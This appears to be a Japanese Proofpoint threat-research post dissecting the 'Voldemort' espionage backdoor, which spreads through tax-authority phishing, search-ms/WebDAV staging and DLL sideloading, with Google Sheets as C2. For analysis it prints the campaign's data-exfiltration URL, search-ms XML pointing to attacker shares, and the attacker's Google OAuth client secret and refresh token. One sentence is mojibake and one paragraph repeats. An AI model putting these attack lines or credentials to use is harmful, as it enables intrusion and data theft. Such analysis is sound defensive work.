Threat actor hood

名前を蚀っおはいけないスパむ掻動の疑いがある "ノォルデモヌト "マルりェア

Share with your network!

䞻な調査結果 

  • プルヌポむントのリサヌチャヌは、「Voldemortノォルデモヌト」ず名付けたマルりェアを配信する特異的な攻撃キャンペヌンを確認したした。  
  • プルヌフポむントは、掻動の目的はスパむ掻動であるず䞭皋床の確信を持っお評䟡しおいたす。  
  • この攻撃掻動はペヌロッパ、アゞア、アメリカ、日本の各囜政府の皎務圓局になりすたし、䞖界䞭の数十の組織を暙的にしたした。
  • 攻撃の最終目的は䞍明ですが、Voldemortノォルデモヌトは情報収集ず远加ペむロヌドをダりンロヌドする胜力を備えおいたす。
  • Voldemortの攻撃チェヌンは、コマンド・アンド・コントロヌルC2にGoogle スプレッドシヌトを䜿ったり、倖郚共有に保存された怜玢ファむルを䜿ったりするなど、特異的なカスタマむズ機胜を備えおいたす。
     

抂芁 

2024幎8月、プルヌフポむントのリサヌチャヌは、カスタムマルりェアを配信するために斬新な攻撃チェヌンを䜿甚する特異的な攻撃キャンペヌンを確認したした。プルヌフポむントは、このマルりェア内で䜿甚されおいる内郚ファむル名ず文字列に基づいお、このマルりェアを「Voldemortノォルデモヌト」ず呜名したした。

この攻撃チェヌンは、珟圚、倚くの攻撃で流通しおいる耇数の手法ずずもに、Google スプレッドシヌトをコマンド・アンド・コントロヌルC2のために䜿甚するなど、䞀般的ではない手法で構成されおいたす。その戊術、技術、手順TTPの組み合わせ、各囜の政府機関になりすたした誘いテヌマ、「test」のような奇劙なファむル名ずパスワヌドは泚目に倀したす。リサヌチャヌは圓初、この掻動がレッドチヌムによるものではないかず疑っおいたしたが、倧量のメッセヌゞずマルりェアの分析により、攻撃グルヌプによるものず断定したした。

プルヌフポむントは、これは情報収集を目的ずしたAPT高床暙的型攻撃である可胜性が高いず䞭皋床の確信を持っお評䟡しおいたす。しかし、プルヌフポむント瀟は、特定の攻撃グルヌプ※プルヌフポむントではTAで始たるグルヌプ呜名に高い信頌性をもっおアトリビュヌションさせるための十分なデヌタを珟時点では持ち合わせおいたせん。暙的が広範囲に及んでおり、兞型的なサむバヌ犯眪の特城ず䞀臎しおいるにもかかわらず、掻動の性質ずマルりェアの機胜は、珟時点では金銭的利益よりもむしろスパむ掻動ぞの関心の高さを瀺しおいたす。

VoldemortはC蚀語で曞かれたカスタム・バックドアで、情報収集や远加のペむロヌドを投䞋する機胜を備えおいたす。プルヌフポむントは、この攻撃グルヌプのむンフラ䞊でCobalt Strikeがホストされおいるこずを確認しおおり、これが配信されるペむロヌドの1぀である可胜性が高いず考えおいたす。
 

攻撃キャンペヌン詳现

攻撃量ずタヌゲット

2024幎8月5日に始たった悪質な掻動には20,000を超えるメッセヌゞが含たれ、䞖界の70以䞊の組織に圱響を䞎えたした。最初のメッセヌゞの波は毎日数癟通でしたが、8月17日に急増し、合蚈6,000通近くになりたした。  

攻撃グルヌプは、様々な皎務圓局からのメッセヌゞを装っお、受信者に皎務申告の倉曎に぀いお通知しおいたす。攻撃キャンペヌンの期間䞭、米囜IRS: 内囜歳入庁、英囜HM Revenue & Customs、フランスDirection Générale des Finances Publiques、ドむツBundeszentralamt fÃŒr Steuern、むタリアAgenzia delle Entrate、そしお8月19日からはむンドIncome Tax Department、日本囜皎庁の皎務圓局がなりすたしに䜿われたした。それぞれの攻撃ルアヌおずり文曞はカスタマむズされ、なりすたそうずしおいる圓局の蚀語で曞かれおいたした。

プルヌフポむントのアナリストは、メヌルの文蚀ず䞀郚の暙的ずされた人物に぀いお公開されおいる情報を関連付け調査したずころ、攻撃グルヌプが暙的組織の掻動囜やメヌルアドレスから抜出できる囜や蚀語ではなく、居䜏囜を䜿っお暙的を絞っおいるこずを突き止めたした。䟋えば、欧州の倚囜籍組織に属するある暙的ずなった人物は、公開されおいる情報から米囜ず結び぀いおいたため、米囜のIRS内囜歳入庁になりすたした電子メヌルを受け取っおいたした。ただし、䞀郚の被害者は、その人ず同姓同名の人物がむンタヌネット䞊で情報が公開されおいる堎合、実際に攻撃を受けた被害者の居䜏囜ずは異なる蚀語ず内容の攻撃メヌルを受け取っおいたした。 

電子メヌルは䟵害された疑いのあるドメむンから送信され、行為者は電子メヌル・アドレスに実圚する機関のドメむンを含めおいた。䟋えば、米囜囜皎庁になりすたした電子メヌルは、次のようなものでした。

差出人: Federal IRS <no_reply_irs[.]gov@amecaindustrial[.]com>  

その他の送信者ドメむンには以䞋も含たれたす

        tblsys[.]com 
        joshsznapstajler[.]com 
        ideasworkshop[.]it 

Voldemoteマルりェアのおずりメヌル英囜、フランス、日本

 

英囜HM Revenue & CustomsずフランスDirection Générale des Finances Publiques、日本囜皎庁になりすたしたメヌル文面  
 

攻撃は18の異なる業皮を暙的ずしおいたしたが、暙的ずなった組織のほが4分の1は保険䌚瀟でした。残りの50%は航空宇宙、運茞、倧孊でした。  

Figure 2

Voldemortマルりェアのメヌル攻撃キャンペヌンの暙的の業皮内蚳
 

攻撃チェヌン

メッセヌゞには、InfinityFreeでホストされおいるランディングペヌゞにリダむレクトするGoogle AMP Cache URLが含たれおいたす。ランディングペヌゞには、クリックするずブラりザのナヌザヌ゚ヌゞェントをチェックする「Click to view document」リンクが含たれおいたす。

Figure 3

InfinityFreeがホストするランディングペヌゞでは、バックグラりンドでナヌザヌ゚ヌゞェントのチェックが行われ、
「ドキュメントを衚瀺」ボタンをクリックした埌、被害者にWindows゚クスプロヌラを開くよう求めるポップアップが衚瀺さる

 

User Agent に「windows」が含たれおいる堎合、ブラりザは.search-msで終わるTryCloudflareでトンネリングされたURIを指すsearch-ms URIにリダむレクトされ、被害者にWindows゚クスプロヌラを開くよう促したすが、このク゚リが被害者に衚瀺されるこずはなく、結果ずしお衚瀺されるポップアップのみが衚瀺されたす。たた、ロギングサヌビスpingb.inを実行しおいるIPアドレス䞊の/stage1で終わるURLから画像をロヌドし、リダむレクト成功のログを蚘録したす。pingb.inサヌビスを䜿甚するこずで、攻撃者は被害者に関する远加のブラりザおよびネットワヌク情報を収集するこずができたす。

Figure 4

ランディングペヌゞに埋め蟌たれたHTMLリダむレクトロゞック
 

User Agent に "windows "が含たれおいない堎合、ブラりザは空のGoogle Drive URLにリダむレクトされ、pingb.inのIPから同様に画像を読み蟌みたすが、URLの末尟は/stage0になりたす。これにより、攻撃者は、ボタンをクリックしたが悪意のあるコンテンツは提䟛されなかった人のブラりザずネットワヌクの詳现を远跡するこずができたす。

被害者がWindows゚クスプロヌラヌを開くこずを受け入れるず、Windows゚クスプロヌラヌはリンクされた.search-msファむルの指瀺に埓っおWindows怜玢ク゚リヌを無蚀で実行したす。.search-msファむルはナヌザヌにダりンロヌドされたり衚瀺されたりするこずはなく、このブログの「保存された怜玢ファむル圢匏の悪甚」で説明するファむル圢匏を悪甚したす。この結果、Windowsショヌトカットファむルファむル拡匵子がLNKのファむル、たたはキャンペヌン埌半では、元の電子メヌルのルアヌに関連するファむル名を䜿甚したWindows゚クスプロヌラで同様のLNKを含むZIPファむルが衚瀺されたす。 このLNKたたはZIPは、同じTryCloudflareホスト䞊にホストされおいたすが、別のWebDAV共有である \pubache にホストされおいたす。このファむルは、倖郚共有ではなく、受信者のホストのダりンロヌド フォルダに盎接ホストされおいるように芋えたす。たた、PDFアむコンを䜿っお別のファむルタむプを装っおいたす。これら2぀のテクニックにより、受信者はロヌカルのPDFファむルであるず信じ、コンテンツをクリックする可胜性が高くなっおしたいたす。  

Figure 5

倖郚WebDAVにホストされおいるPDFを、あたかもナヌザヌのロヌカルダりンロヌドフォルダにあるかのように芋せかけるショヌトカット

 

LNK が実行されるず、PowerShell が起動され、同じトンネル䞊の 3 番目の WebDAV 共有 (\resource\)から Python.exe が実行され、同じホスト䞊の 4 番目の共有 (\resource\)にある Python スクリプトが匕数ずしお枡されたす。これにより、Pythonはコンピュヌタにファむルをダりンロヌドするこずなく、WebDAV共有から䟝存関係を盎接ロヌドしおスクリプトを実行したす。

Figure 6

LNKを開いたずきにナヌザヌに衚瀺されるセキュリティ通知


実行されるPythonスクリプトは、蚀語ず地理的なタヌゲットによっお、オリゞナルのルアヌに固有のものです。興味深いこずに、このチェックはランディングペヌゞですでに行われおいたにもかかわらず、オペレヌティングシステムのチェックから始たりたす。スクリプトがWindows環境を怜出するず、特定のアクションを実行したす。しかし、他のオペレヌティング・システムでは、䜕の機胜も実行されたせん。Windows䞊でのこれらのアクションには、以䞋が含たれたす

  • Python関数platform.uname()を䜿っお、コンピュヌタ名、Windowsのバヌゞョン情報、CPU情報など、コンピュヌタに関する情報を収集
  • 䟋えば、ランディングペヌゞず同じpingb.inのIPにGETリク゚ストでデヌタをURLのbase64ずしお送信するが、URLには以䞋のように/stage2-2/を指定   hxxp://83[.]147[.]243[.]18/p/7c31e3ebfb77ead34ea71900b1b0/stage2-2/[base64 string] 

Figure 7

攻撃者のpingb.inのWebむンタヌフェヌス

Figure 8

pingb.inトラフィックのPCAP  

GETリク゚ストは、Python HTTPラむブラリによっお自動的に生成される暙準ヘッダヌ以倖、他のデヌタを含んでいたせん。そしお、OpenDrive(OneDriveのようなファむルホスティングサヌビス)からタヌゲット囜に関連するおずりPDFをダりンロヌドし、それを開きたす。

Figure 9

フランスのDGFIPDirection Générale des Finances PubliquesになりすたしたおずりPDF

スクリプトは、コンピュヌタ名、ナヌザヌ名、ドメむン、そしお再びplatform.uname()の結果を収集し、それをbase64文字列ずしお栌玍し、䞊蚘のように投皿したすが、今回はURLに/stage1-2/を含んでいたす(stage2-2の埌に実行されおいるにもかかわらず)。

これは、パスワヌドで保護されたtest.pngたたはlogo.pngずいうZIPファむルをOpenDriveからダりンロヌドし、それを%localappdata%MicrosoftWindows\test.zipたたはlogo.zipずしお保存し、"test@123 "ずいうパスワヌドを䜿甚しお、䞭身のCiscoCollabHost.exeずCiscoSparkLauncher.dllを抜出したす。

このファむルは CiscoCollabHost.exe を実行し、Python スクリプトの最終アクションずしおダりンロヌドした ZIP を削陀したす。CiscoCollabHost.exe は WebEx に関連する正芏の実行ファむルで、CiscoSparkLauncher.dll ずいう DLL をサむドロヌドするために䜿甚されたす。

゚クスポヌトされたDLL名「Voldemort_gdrive_dll.dll」、たたはキャンペヌン埌半では「Voldemort_gdrive_c.dll」を持぀CiscoSparkLauncher.dllに぀いおは、本レポヌトのマルりェア分析セクションで詳しく説明しおいたす。ProofpointはこのペむロヌドをVoldemortずしお远跡しおいたす。

各ランディング ペヌゞぞの URL は固定されおいたすが、最初の seach-ms ク゚リおよびその埌の WebDAV 共有で䜿甚される TryCloudflare トンネルのホスト名は、頻繁に毎日倉曎されおいたす。ホスト名が倉曎されおも、WebDAV共有の構造は同じです

        \public\ - contains the .search-ms files. 
        \pub\ - contains the LNK or later ZIP files 
        \library\ - contains the Python distribution and dependencies 
        \resource\ - contains the Python scripts 

Voldemortは情報収集機胜を備えたバックドアであり、远加のペむロヌドをロヌドするこずができたす。このマルりェアず関連するペむロヌドの技術的な詳现に぀いおは、以䞋をご芧ください。
 

サむバヌ犯眪の雰囲気を持぀APT掻動

興味深いこずに、この攻撃グルヌプは、サむバヌ犯眪の䞖界では䞀般的になり぀぀ある耇数のテクニックを䜿甚しおおり、その量ずタヌゲティングもサむバヌ犯眪キャンペヌンに沿ったものであるこずに加えお、特異的な特城を持っおいたす。それは、この攻撃キャンペヌンにおいお䜿われおいる誘い文句は、サむバヌ犯眪においおは兞型的なものですが、バックドアに含たれる機胜は、スパむ掻動に䜿甚されるツヌルに通垞芋られる機胜ずより類䌌しおいたす。

攻撃グルヌプは、ファむルスキヌマURIを悪甚しお、マルりェアのステヌゞングのために倖郚のファむル共有リ゜ヌス特にWebDAVずSMBServer Message Blockにアクセスしたす。これは、スキヌマ「file://」を䜿甚し、悪意のあるコンテンツをホストするリモヌトサヌバヌを指すこずで行われたす。この手口は、IABむニシャル・アクセス・ブロヌカヌを含むサむバヌ犯眪の脅嚁によっお、たすたす倚く、 é »ç¹ã« èŠ³å¯Ÿã•ã‚Œã‚‹ã‚ˆã†ã«ãªã£ãŠã„ãŸã™ã€‚  

プルヌフポむントのリサヌチャヌは最近、Cloudflareトンネルの悪甚が増加しおいるこずを確認したした。特に、攻撃者がアカりントを䜜成せずに1回限りのトンネルを䜜成できるTryCloudflare機胜が泚目されおいたす。トンネルは、仮想プラむベヌトネットワヌクVPNやセキュアシェルSSHプロトコルを䜿甚するように、ロヌカルネットワヌク䞊にないデヌタやリ゜ヌスにリモヌトアクセスする方法です。  TryCloudflare トンネルを䜿甚するたびに、trycloudflare[.]com䞊にランダムなサブドメむンが生成されたす䟋: ride-fatal-italic-information[.]trycloudflare[.]com。サブドメむンぞのトラフィックは、Cloudflareを通しお運営者のロヌカルサヌバヌにプロキシされたす。泚目すべきこずに、Voldemort の掻動では、プルヌフポむントが他の悪意のある掻動クラスタヌで芳枬したように、攻撃メッセヌゞキャンペヌンの波ごずに新しいトンネルを䜜成するのではなく、2024 幎 8 月の 1 か月間で攻撃グルヌプが䜿甚した独自の TryCloudflare トンネルはわずか 4 ぀でした。以前に芳枬された掻動ずは異なり、このキャンペヌンでは Python の䟝存関係がホスト䞊で盎接ダりンロヌドされず、代わりに WebDAV 共有からロヌドされたした。  
 

保存された怜玢ファむル圢匏の悪甚

䞀般的に、攻撃者はWindowsの怜玢プロトコル(search-ms)を悪甚し、リモヌトマシンにホストされおいるファむルをフォルダ内にロヌカルに衚瀺したす。この手法は、さたざたなリモヌトアクセス型トロむの朚銬RATを展開するためによく䜿甚されたす。Search-msは、アプリケヌション、JavaScript、たたはHTMLが、信頌できるコンテンツのように芋えるリモヌトファむルをホスト䞊に盎接衚瀺するこずを可胜にしたす。プルヌフポむントは、コモディティマルりェアのナヌザヌからむニシャル・アクセス・ブロヌカヌIABに至るたで、耇数のサむバヌ犯眪の脅嚁者がこの手法を掻甚しおいるこずを確認しおいたす。Voldemortマルりェアのキャンペヌンでは、WebDAV共有䞊に怜玢ク゚リをファむルずしお保存させる保存怜玢ファむル圢匏.search-msずいう、ほずんど芳枬されおいない手法が䜿甚されおいたす。   

通垞、攻撃者がマむクロ゜フトの怜玢プロトコルを悪甚する堎合、URIには怜玢が実行されるホスト、実行されるク゚リ、怜玢の衚瀺名が含たれたす。このケヌスでは、search-ms URIには衚瀺名ず、同じく.search-msで終わるWebDAV共有䞊のURIに察する以䞋のようなサブク゚リだけが含たれおいたした。

        Search[:]displayname=Downloads&subquery=%5C%ways-sms-pmc-shareholders[.]trycloudflare.com@SSL%5Cpublic%5CSA150_Notes_2024.search-ms 

さらに䞍可解なこずに、このク゚リをWindows゚クスプロヌラで開くず、代わりに.lnkたたは.zipファむルの怜玢に誘導され、ファむルが開かれたこずなどの衚瀺は䞀切なく、ク゚リは無蚀で実行されたした。さらに、プルヌフポむントのリサヌチャヌが手動でファむルの堎所を確認したずころ、そのファむルは、もはやthe \public shareにはありたせんでした。その代わりに、衚瀺されたファむルは同じホスト䞊にある「˶」共有に存圚しおいたした。調査の結果、リサヌチャヌは、開くず怜玢URIを開いたのず同じ䜓隓をもたらす仮想フォルダを発芋したした。この仮想フォルダは、実際には怜玢URIで䜿甚されおいる.search-msファむルでした。

Figure 10

ブラりザ経由でWebDAV共有を手動でブラりズ

これらの.search-msファむルは、"Saved Search File Format"ずいうタむプのXMLファむルであるこずが刀明したした。通垞、これらのファむルはWindowsで怜玢を実行し、怜玢りィンドりで右クリックしお "Save search "を遞択するなど、手動で怜玢を保存したずきに䜜成されたす。

Figure 11

ロヌカルで怜玢し、怜玢結果を保存しお.search-msファむルを䜜成

Figure 12

怜玢結果を保存した埌の.search-msファむル

怜玢を保存するず、Windowsホスト䞊の保存された怜玢フォルダに.search-msファむルが䜜成されたす。しかし、既知のファむルタむプの拡匵子を衚瀺するオプションが遞択されおいおも、この拡匵子は隠されたす。これは、Windowsショヌトカットの拡匵子.lnkをナヌザヌが通垞芋ないのず䌌おいたす。保存された怜玢の機胜は、誰かが定期的に同じ怜玢を実行し、䞀貫した方法で衚瀺された結果で簡単に繰り返したい状況を意図しおいたす。search:やsearch-ms.URIず䌌おいたすURIず同様に、同じ怜玢を再床実行したす。しかし、.search-msファむルでは、ナヌザヌはWindows゚クスプロヌラに結果をより具䜓的に衚瀺させる方法を指定するこずもできたす。.search-msファむルを悪甚するず、被害者がロヌカルマシン䞊のフォルダにいないこずを瀺す芁玠を、より効果的に隠すこずができたす。

この攻撃者が䜿甚しおいた.search-msファむルの䞭から興味深い郚分をいく぀か玹介したす

  • ファむルを手動で線集し、特にビュヌを "ダりンロヌド" ずしお衚瀺するように指定
       <viewInfo iconSize="32" stackIconSize="0" displayName="Downloads" autoListFlags="0"> 
  • Windows ゚クスプロヌラヌでナロヌ・ビュヌを定矩するこずで、ファむルがどの共有でホストされおいるかを瀺すアヌティファクトをより効果的に隠す
       <column viewField="System.ItemFolderPathDisplayNarrow"/> 
  • 共有䞊の悪意のあるファむルのみを衚瀺する怜玢条件
     <condition type="leafCondition" property="System.FileName" operator="starts with"   propertyType="string" value="ABC_of_Tax.zip" localeName="en-US"> 
  • 怜玢するフォルダたたは共有ぞのパスを指定。GUIDはネットワヌクの堎所を瀺す
    <include path="::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\\invasion-prisoners-inns-aging[.]trycloudflare[.]com@SSL\pub" attributes="1887437133"/> 
  • .search-msファむルを䜜成したWindowsナヌザヌの衚瀺名を含むAuthor Type
       <author type="string">test</author> 

 

マルりェア解析

このマルりェアは、DLLハむゞャックに察しお脆匱なCiscoCollabHost.exeを利甚しお実行されたす。この実行ファむルは、実行ファむルず同じディレクトリにあるCiscoSparkLauncher.dllずいうDLLをロヌドしようずしたすが、この堎合はマルりェアです。唯䞀の芁件は、DLLが正しい名前を持ち、SparkEntryPointずいう関数を゚クスポヌトするこずです。  

このSparkEntryPointは、短時間で実行されるサンドボックスを回避しようずするゞッタヌ量ず、およそ5〜10分のスリヌプメカニズムで開始したす。

Figure 13

スリヌプタむムの蚈算

そしおマルりェアは、比范的ナニヌクなAPIを動的に呌び出すルヌチンを持っおいたす。関数を解決しお呌び出すために、マルりェアはDLLハンドル、関数ぞのコヌルバック、呌び出そうずする関数の匕数を枡したす。 

Figure 14

関数を解決しお呌び出すためのコヌル

コヌルバックは、Windows APIを呌び出す関数の䞭で呌び出される文字列を埩号する関数です。  

Figure 15

解決された関数を呌び出し、匕数をスタックに保持するスタブ

Cobalt Strikeのシェルコヌドは、リゟルバが探しおいる関数を呌び出すだけでなく、その関数をリゟルバするテクニックをよく䜿いたす。

文字列を埩号するために、このマルりェアはXTEAに非垞によく䌌たアルゎリズムに䟝存しおいたすが、ブロック埩号のルヌプを取り陀くために展開されおいたす。

Figure 16

埩号アルゎリズム

展開されたアルゎリズムは以䞋の通り

Figure 17

展開されたアルゎリズム

分析䞭、プルヌフポむントはこのアルゎリズムが非暙準的であるこずを発芋したため、゚ミュレヌション手法を甚いお埋め蟌たれた文字列を埩号したした。

MrExodiaによる玠晎らしいツヌルDumpulator を利甚すれば、x64dbgでマルりェアのダンプを䜜成し、それをPython環境内のカスタム・ツヌルずしお䜿うこずができたす。

Figure 18

文字列を埩号するためのDumpulatorの䜿い方を瀺すPythonコヌド

これによっお、比范的シンプルでWindowsの内郚に䟝存しない関数をマルりェア内で呌び出すこずができたす。これには、他の呌び出しを行わず、デヌタを倉換するだけの関数が適しおいたす。  

Pythonスクリプトぱミュレヌションを䜿甚しお文字列の埩号を実装し、最埌に暗号化された内容を曞き蟌んだ割り圓おメモリヌから埩号化された文字列を読み取るこずができたす。このコヌドをDLLのデヌタセクション党䜓で実行するず、サンプル内のすべおの埩号化された文字列が埗られたす

Figure 19

埩号化された文字列 

APIコヌルが解決されるず、マルりェアは自身のコンフィギュレヌションを埩号化するこずで続行したす。暗号化されたコンフィギュレヌションぞの盎接の参照を保存する他のマルりェアずは異なり、このマルりェアは自身のファむルから怜玢する文字列を含んでいたす。  

Figure 20

”g00 "で瀺される暗号化されたコンフィギュレヌションの開始

次の4バむトはコンフィグの長さを瀺し、残りのデヌタは実行ファむル名「CiscoCollabHost.exe」を䜿ったXOR暗号によっお埩号されたす。このデヌタを埩号するず、マルりェアがコマンドコントロヌルC2サヌバヌず通信するために必芁なキヌが埗られたす。次の衚は、コンフィギュレヌションから関連する埩号化された文字列を瀺しおいたす。  

test 

962194083343-nevo9pjnlr7cgirjs1eonpebakrlq3qc.apps.googleusercontent.com 

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 

1//0eg8RBquaRQvhCgYIARAAGA4SNwF-L9IrSsPADLEx_CMsoJYspPSfaoeUbxii4xLVK10CafejzYAEBi2IptPt9KpwO7vphUTPFtest 

962194083343-nevo9pjnlr7cgirjs1eonpebakrlq3qc.apps.googleusercontent.com 

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 

1//0eg8RBquaRQvhCgYIARAAGA4SNwF-L9IrSsPADLEx_CMsoJYspPSfaoeUbxii4xLVK10CafejzYAEBi2IptPt9KpwO7vphUTPF28 

マルりェアは、専甚のむンフラや䟵害されたむンフラを䜿甚するのではなく、C2、デヌタ流出、オペレヌタヌからのコマンド実行のためにGoogle スプレッドシヌトのむンフラを利甚したす。

この時点で、マルりェアはC2ずの通信を開始するために必芁な情報をすべお入手しおいる。マルりェアはクラむアント・トヌクンを䜿っおGoogle スプレッドシヌトを䜿甚しおいるため、Google シヌトにデヌタを曞き蟌む前に認蚌を行う必芁がありたす。 

Figure 21

Google からアクセストヌクンを取埗する POST リク゚スト

クラむアントID、クラむアント・シヌクレット、リフレッシュ・トヌクン倀は、埩号されたコンフィギュレヌションから取り出され、アクセストヌクンを受け取るために送信されたす。

Figure 22

Googleからアクセストヌクンを取埗する生リク゚スト

アクセストヌクンを取埗したマルりェアは、ボット甚のコマンドを含む指定されたGoogle スプレッドシヌトを読むこずができたす。

Figure 23

C2ずしお機胜するシヌトからデヌタを読み取るコヌド

シヌトを読み取るための最初のリク゚ストは、自身のデヌタをどこに曞き蟌むかをチェックするために行われたす。UUIDが返された堎合、そのセット内にすでに被害者のデヌタがあるこずがわかりたす。その埌、UUIDが返されなくなるたで、2:2などの読み取りを続行したす。以䞋は、UUIDが返されたこずを瀺すリク゚ストです 

Figure 24

シヌトから返されたUUIDを瀺す生レスポンス

6回繰り返した埌、マルりェアがUUIDを取り戻さなければ、マルりェアは既存のボットデヌタを䞊曞きするこずなく、それらのセルに自由に曞き蟌むこずができるこずを瀺しおいたす。

Figure 25

UUIDが返されないこずを瀺す生の応答

意図しない結果ずしお、セルを反埩するこのルヌプは、指定されたGoogleシヌト内に䜕人の犠牲者がいるかを瀺しおいたす。

マルりェアはデヌタを曞き蟌めるセルを芋぀けるず、6行目にホスト情報の配列を送りたす

Figure 25

Google シヌトにホスト情報をアップロヌドするボットの生のリク゚スト

以䞋の衚に、このリク゚ストに含たれる泚目すべきフィヌルドのいく぀かを瀺したす。このリク゚スト内のほずんどの倀はbase64で゚ンコヌドされ、RC4キヌずしお実行ファむルのファむル名を䜿甚しおRC4で暗号化されたす䟋: "CiscoCollabHost.exe"

Bot UUID  

Local IP 

Hostname 

Username 

Program Files list 

Program Files (x86) list  

Environment Variables 

Filename of executable 

Infection Timestamp 

フィヌルドの説明

マルりェアのこの時点で、攻撃者はGoogleシヌト経由でボットにコマンドを発行できたす。マルりェアがサポヌトするコマンドは以䞋の通り

  • Ping 
  • Dir 
  • Download 
  • Upload 
  • Exec 
  • Copy 
  • Move 
  • Sleep 
  • Exit 

これらはすべお、操䜜が成功したか吊かを瀺す独自のステヌタス・メッセヌゞず、マルりェアのリヌク名「Voldemort」を䌎っおいたす。  

Figure 26

コマンド実行に関連するステヌタスメッセヌゞの埩号
 

Googleを探玢

マルりェアが通信プロトコルずしお暙準的なサヌビスを䜿甚しおおり、そのサヌビスがGoogle スプレッドシヌトからデヌタを読み取るためにクラむアントIDずクラむアントシヌクレットを公開しおいるこずを確認した埌、どのような情報が利甚可胜かを確認するために、指定されたGoogle スプレッドシヌトを探玢する䟡倀があるず感じたした。以䞋のPythonコヌドにより、Google スプレッドシヌトetにホスト情報を送信するたでに至ったアクティブな感染をすべお特定したした。合蚈で、合蚈6぀の被害者をシヌトで芳枬し、そのうちの1぀を陀くすべおがサンドボックスたたは既知のリサヌチャヌでした。

Figure 27

Google シヌトからデヌタを読み蟌む方法を玹介するPythonコヌド

Googleシヌト内の他のペヌゞを探玢するこずで、スプレッドシヌトに登録されおいる少数のボットに぀いお、攻撃者経由で実行されたコマンドを確認するこずもできたした。攻撃者が盞互䜜甚する被害者マシンごずに、ホスト名ナヌザヌ名を名前ずする新しいペヌゞが䜜成されたす。この蚘事を曞いおいる時点では、攻撃者は2぀のディレクトリのディレクトリリストを衚瀺するコマンドしか実行しおいたせんでした。  Googleシヌト内の他のペヌゞを探玢するこずで、スプレッドシヌトに登録されおいる少数のボットに぀いお、攻撃者経由で実行されたコマンドを確認するこずもできたした。攻撃者が盞互䜜甚する被害者マシンごずに、ホスト名ナヌザヌ名を名前ずする新しいペヌゞが䜜成されたす。この蚘事を曞いおいる時点では、攻撃者は2぀のディレクトリのディレクトリリストを衚瀺するコマンドしか実行しおいたせんでした。  

Google スプレッドシヌトの閲芧から読み解けたこずをもずに、私たちはこれらの仕組みが他に䜕を読むこずができるのか芋る必芁性を感じた。Sheetリヌダヌず同じようなPythonコヌドをGoogle Driveの読み蟌みに䜿っおみるず、興味深い結果が埗られたした。そのためにはフォルダIDが必芁です。幞運なこずに、Sheet IDず同様に、このDrive IDは感染したマシンがDriveに興味のあるファむルをアップロヌドするための蚭定に埋め蟌たれおいたした。  

Figure 28

Google Drive内のファむルを䞀芧衚瀺するPythonコヌド

このスクレむピングにより、フォルダヌの内容党䜓を照䌚し、特定のアップロヌドされたファむルをダりンロヌドするこずができた。この䜜業から、我々は以䞋のファむルを特定したした

  • API (Google Sheet used for C2) 
  • 7za.exe (7z executable) 
  • Test.7z (Password protected 7z) 

远加のフォルダ: 

  • V1 [2023] 
  • V2 [2023] 
  • V1 [2023] 

これらのディレクトリには、OpenWRT ファヌムりェア・コヌドに関連するトレヌニング資料が含たれおいたした。  

Figure 29

攻撃者のGoogle Driveのディレクトリ出力

これらのファヌムりェアの画像に加えお、以䞋のような1枚の写真がありたした

Figure 30

OpenWRTのGUI

プルヌフポむントのリサヌチャヌは、これらのファむルが被害者のいずれずも察話するために䜿甚されおいないのを確認しおいたす。そのため、これらのファむルの目的は䞍明です。これらのファむルは、行為者が行った他の掻動の残りである可胜性がありたす。  

グヌグル・ドラむブ内のtest.7zずいうファむルは、パスワヌドで保護された7-zipアヌカむブです。パスワヌドは明らかにされおいないが、䞀般的に芳枬されおいるパスワヌド "test123 "でアヌカむブは簡単に埩号されたした。このアヌカむブにはDLLず実行ファむルが含たれおいたした。 

Figure 31

攻撃者によっおアップロヌドされたテストファむルを瀺すディレクトリ䞀芧

実行ファむル "Shuaruta.exe "は、DLLのサむドロヌディングに脆匱なもう䞀぀の実行ファむルです。Shuaruta.exeプログラムは、Go蚀語で曞かれ、単にCobalt Strike Beaconをロヌドする「nvdaHelperRemote.dll」をサむドロヌドするために䜿われる可胜性がありたす。幞運なこずに、Goバむナリの開発者はシンボルずデバッグ情報を䜿っおこれをコンパむルしたした。

Figure 32

Cobalt Strike を泚入するための Go バむナリに含たれるデバッグ出力

これにより、朜圚的なナヌザヌ名 (yOIR) ず DLL がコンパむルされた時期の情報が埗られたす。最埌に、Cobalt Strike ビヌコン自身から蚭定を抜出するず、以䞋の関連フィヌルドが埗られたした

        DOMAINS: ['autodiscover[.]iitt[.]eu[.]org'] 

        URIS: ['/ows/v1/OutlookCloudSettings/settings/global'] 

        WATERMARK: 987654321 

        USERAGENT: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64;Trident/6.0) 

このCobalt Strike構成の透かしは、゜フトりェアのクラックされたバヌゞョンに関連しおいたす。この透かしは、オヌプン゜ヌスレポヌトの耇数の無関係な脅嚁で芳察されおいたす。eu[.]orgドメむンは、非営利団䜓に無料のサブドメむンを提䟛する䞀般に利甚可胜なドメむンです。  
 

アトリビュヌション攻撃者の玐づけ

プルヌフポむント瀟では、この掻動を既知の攻撃グルヌプずは断定しおいたせん。マルりェアの機胜性やシヌトを調査した際に芳察された収集デヌタから、情報収集がこの攻撃キャンペヌンの目的の1぀であったず考えられたす。キャンペヌンの特城の倚くはサむバヌ犯眪の脅嚁掻動ず䞀臎しおいたすが、私たちは、これはただ䞍明な最終目的を支揎するために行われたスパむ掻動である可胜性が高いず評䟡しおいたす。

フランケンシュタむンのように巧劙に掗緎された機胜ず、非垞に基本的なテクニックや機胜が組み合わされおいるため、脅嚁行為者の胜力のレベルを評䟡するこずは難しく、キャンペヌンの最終的な目暙を高い信頌性を持っお決定するこずは困難です。倧量の電子メヌルを䜿甚しお、実際の暙的を目立たなくさせた可胜性もありたすが、攻撃者が䜕十もの組織を玔粋に感染させたかった可胜性も同様にありたす。たた、ツヌルの開発や初期アクセスに関するさたざたなレベルの経隓を持぀耇数の攻撃者がこの掻動に取り組んだ可胜性もありたす。党䜓ずしお、これは非垞に特異的な攻撃キャンペヌンずなっおいたす。
   

なぜそれが重芁なのか

この行動には、耇数のサむバヌ犯眪の攻撃者が、初期アクセスの゚コシステム党䜓で継続的な実隓の䞀環ずしお同様のテクニックを䜿甚しおおり、耇数のばらばらのキャンペヌンで芳察された最近流行しおいるさたざたなテクニックが組み合わされおいたす。この攻撃キャンペヌンで䜿甚されたテクニックの倚くは、サむバヌ犯眪の珟堎でより頻繁に芳察されおおり、スパむ掻動の疑いを持たれおいる攻撃者は、金銭的な動機を持぀攻撃者ず同じTTPを䜿甚するこずが倚いこずを瀺しおいたす。

